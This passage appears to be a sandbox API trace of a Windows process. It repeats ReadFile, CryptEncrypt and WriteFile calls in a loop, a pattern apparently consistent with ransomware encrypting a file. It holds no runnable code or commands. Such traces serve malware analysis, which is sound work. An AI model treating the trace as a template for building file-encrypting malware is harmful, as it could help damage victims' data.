pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.614] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.614] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.614] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.614] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.615] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.615] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.615] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.615] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.615] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.615] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.615] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.615] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.615] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.615] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.615] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.615] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.616] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.616] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.616] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.616] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.616] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.616] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.616] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.616] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.616] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.616] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.617] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.617] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.617] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.617] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.617] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.617] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.617] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.617] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.617] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.617] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.618] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.618] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.618] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.618] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.618] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.618] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.618] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.618] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.618] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.618] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.618] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.618] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.619] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.619] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.619] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.619] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.619] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.619] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.619] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.619] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.619] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.619] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.619] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.619] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.619] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.620] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.620] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.620] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.620] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.620] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.620] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.620] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.620] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.620] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.620] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.620] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.620] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.620] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.621] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.621] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.621] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.621] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.621] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.621] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.621] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.621] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.621] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.621] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.622] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.622] WriteFile (in: hFile=0x5d4c, 